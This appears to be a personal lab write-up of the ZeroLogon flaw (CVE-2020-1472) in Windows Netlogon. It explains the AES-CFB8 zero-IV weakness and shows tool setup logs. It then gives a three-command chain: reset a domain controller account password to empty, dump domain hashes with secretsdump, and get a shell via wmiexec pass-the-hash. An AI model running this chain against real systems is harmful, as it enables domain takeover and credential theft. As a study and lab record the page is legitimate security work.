[email protected]
Search…
Exploit/CVE PoC
Hacking Report (HTB)
PenTest & Exploitation Guide
Offensive Security Lab & Exam
ZeroLogon Exploit
CVE-2020-1472, 6 Oct 2020
Introduction
​CVE-2020-1472, a privilege elevation vulnerability in the Netlogon Remote Protocol (MS-NRPC) which Microsoft released a patch (KB4565349) fixed in August 2020.
This vulnerability was discovered by secure security researcher Tom Tervoor on 11 September 2020. A weakness point was found on the encryption Advanced Encryption Standard – Cipher Feed Back 8 bit , (AES-CFB8) that used at the MS-NRPC to encrypt the client credential with the "Client Challenge" during the third steps of MS-NRPC.
ZeroLogon, affected all the windows servers that function as Active Directory domain controllers in enterprise networks.
The following diagram is the authentication handshake process of MS-NRPC, the attack happened on steps 3 on encrypting the client credential using the AES-CFB8.
Using the AES-CFB8 in MS-NRPC protocol has an issue with the Initialisation Vector (IV). The IV should be a random number, but MS-NRPC set a fixed IV of 16 bytes of zeros. Thus, if the client challenge set to all zeros, the probability of all zero encryption result is 1/256. It can easy to pass the step 4 validation.
The attack details can be referenced to the Whitepaper by Tom Tervoor
​
Exploitation Demo
Target Environment
Host Name: FKCLAI-WIN2016
OS Name: Microsoft Windows Server 2016 Standard
OS Version: 10.0.14393 N/A Build 14393
Domain: FKCLAI.local
Logon Server: \\FKCLAI-WIN2016
​
Tools Setup
1
[email protected]:~/Documents/ctf/expoit# git clone https://github.com/risksense/zerologon.git
2
Cloning into 'zerologon'...
3
remote: Enumerating objects: 22, done.
4
remote: Counting objects: 100% (22/22), done.
5
remote: Compressing objects: 100% (15/15), done.
6
remote: Total 22 (delta 11), reused 18 (delta 7), pack-reused 0
7
Unpacking objects: 100% (22/22), done.
8
[email protected]:~/Documents/ctf/expoit#
Copied!
Remove all impacket scripts
1
[email protected]:~/Documents/ctf/expoit/zerologon# apt remove --purge impacket-scripts python3-impacket
2
Reading package lists... Done
3
Building dependency tree
4
Reading state information... Done
5
The following packages were automatically installed and are no longer required:
6
automater bdfproxy blindelephant couchdb creddump deblaze dh-python dnmap
7
erlang17-asn1 erlang17-base erlang17-crypto erlang17-eunit erlang17-inets
8
erlang17-mnesia erlang17-os-mon erlang17-public-key erlang17-runtime-tools
9
erlang17-snmp erlang17-ssl erlang17-syntax-tools erlang17-tools erlang17-webtool
10
erlang17-xmerl fimap findmyhash funkload gconf-service gconf2-common
11
ghost-phisher gir1.2-clutter-gst-3.0 gir1.2-gtkclutter-1.0 gir1.2-mutter-2
12
gir1.2-mutter-3 giskismet glusterfs-common gnome-theme-kali grabber
13
guile-2.0-libs gvfs-bin hexorbase intersect irqbalance jad kali-desktop-common
14
keimpx libacl1-dev libadns1 libarmadillo8 libasan4 libattr1-dev libavahi-gobject0
15
libayatana-ido3-0.4-0 libbfio1 libbind9-160 libboost-atomic1.62.0
16
libboost-chrono1.62.0 libboost-date-time1.62.0 libboost-filesystem1.62.0
17
libboost-iostreams1.62.0 libboost-program-options1.67.0 libboost-random1.62.0
18
libboost-serialization1.67.0 libboost-system1.62.0 libboost-test1.67.0
19
​
Copied!
get the latest impacket from the https://github.com/SecureAuthCorp/impacket.git
1
[email protected]:~/Documents/ctf/tools/win# git clone https://github.com/SecureAuthCorp/impacket.git
2
Cloning into 'impacket'...
3
remote: Enumerating objects: 18598, done.
4
remote: Total 18598 (delta 0), reused 0 (delta 0), pack-reused 18598
5
Receiving objects: 100% (18598/18598), 6.17 MiB | 1.62 MiB/s, done.
6
Resolving deltas: 100% (14169/14169), done.
7
​
Copied!
1
[email protected]:~/Documents/ctf/tools/win/impacket# python setup.py install
2
running install
3
running bdist_egg
4
running egg_info
5
creating impacket.egg-info
6
writing requirements to impacket.egg-info/requires.txt
7
writing impacket.egg-info/PKG-INFO
8
writing top-level names to impacket.egg-info/top_level.txt
9
writing dependency_links to impacket.egg-info/dependency_links.txt
10
writing manifest file 'impacket.egg-info/SOURCES.txt'
11
reading manifest file 'impacket.egg-info/SOURCES.txt'
12
reading manifest template 'MANIFEST.in'
13
warning: no files found matching 'tests' under directory 'examples'
14
warning: no files found matching '*.txt' under directory 'examples'
15
writing manife
16
..
17
..
18
..
19
... dding ldapdomaindump 0.9.1 to easy-install.pth file
20
​
21
Using /usr/lib/python3/dist-packages
22
Searching for ldap3==2.5.1
23
Best match: ldap3 2.5.1
24
Adding ldap3 2.5.1 to easy-install.pth file
25
​
26
Using /usr/lib/python3/dist-packages
27
Searching for Flask==1.1.1
28
Best match: Flask 1.1.1
29
Adding Flask 1.1.1 to easy-install.pth file
30
Installing flask script to /usr/local/bin
31
​
32
Using /usr/lib/python3/dist-packages
33
Finished processing dependencies for impacket==0.9.22.dev1+20200929.152157.fe642b24
34
[email protected]:~/Documents/ctf/tools/win/impacket#
35
​
Copied!
Start Exploit
python3 set_empty_pw.py fkclai-win2016 192.168.1.169
secretsdump.py -just-dc administrator/fkclai-win2016\[email protected]
wmiexec.py fkclai/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42
​
Last modified 5mo ago